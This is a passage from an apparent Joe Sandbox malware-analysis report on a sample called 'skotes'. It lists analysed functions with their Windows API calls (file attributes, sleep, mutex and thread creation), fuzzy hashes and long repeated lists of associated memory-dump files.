                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 396266464-2857566196
                                                                                                                                                                    • Opcode ID: fc92cb02fea18cc0a845cda467f757b4b088220ca0b3bcc1b2ba4a847e5f7bcc
                                                                                                                                                                    • Instruction ID: eb94f8a937b8039a245393c25551fe8f10fb474535183a6f0d00d525becb5170
                                                                                                                                                                    • Opcode Fuzzy Hash: fc92cb02fea18cc0a845cda467f757b4b088220ca0b3bcc1b2ba4a847e5f7bcc
                                                                                                                                                                    • Instruction Fuzzy Hash: 48314C31A151048BEB08DBB8DDC9BECB763DFC5314F288658E0649B3D6D73599C08756
                                                                                                                                                                    Function 0061A682 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0061A685
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 396266464-2857566196
                                                                                                                                                                    • Opcode ID: 9b16c0b5ef4b84f8c3756dd4fbb5cdd67b59c05887cd4b68b1db131a0bc65ab4
                                                                                                                                                                    • Instruction ID: fdc577b58f30ec45401a3bf434bfe98dbc88ee68526af28f8ba90895cce6c57a
                                                                                                                                                                    • Opcode Fuzzy Hash: 9b16c0b5ef4b84f8c3756dd4fbb5cdd67b59c05887cd4b68b1db131a0bc65ab4
                                                                                                                                                                    • Instruction Fuzzy Hash: D0313B31A111049BEB08DBB8DD89BEDB773DB81314F288658E064DB3D5D7359AC08756
                                                                                                                                                                    Function 0061A7B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0061A7BA
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 396266464-2857566196
                                                                                                                                                                    • Opcode ID: 58226c50159bf911e7662fa60b5418e539bd69ef1333fa66ac696aaaf4ab7705
                                                                                                                                                                    • Instruction ID: ebf202b935a96ad0b6f0d1bd7f7eaf27da0a234d9b41da97a8bbc5eb13dd38d4
                                                                                                                                                                    • Opcode Fuzzy Hash: 58226c50159bf911e7662fa60b5418e539bd69ef1333fa66ac696aaaf4ab7705
                                                                                                                                                                    • Instruction Fuzzy Hash: D4312A71A151048BEB08DBB8DD89BEDB773DBC1310F288658E064A73D5D7359AC18752
                                                                                                                                                                    Function 0061A960 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: f683e2e0f6ba8ebfc27035a63c2d284fc8ca1cf5bafec5e3050d912423140904
                                                                                                                                                                    • Instruction ID: 69124bb4bb227d48642faba1ca2e17ccebef59864093c45172c3cc087cbf6618
                                                                                                                                                                    • Opcode Fuzzy Hash: f683e2e0f6ba8ebfc27035a63c2d284fc8ca1cf5bafec5e3050d912423140904
                                                                                                                                                                    • Instruction Fuzzy Hash: 86E026306A930096FB0037A8B845BED216787C1700F356C24E128D72E2C91096C05223
                                                                                                                                                                    Function 00617590 Relevance: 4.7, APIs: 3, Instructions: 158sleepthreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064,2054CAE1,?,00000000,00659138,000000FF), ref: 006175CC
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00617430,00678638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 006176BF
                                                                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006176C9
                                                                                                                                                                      • Part of subcall function 0062D0C7: RtlWakeAllConditionVariable.NTDLL ref: 0062D17B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
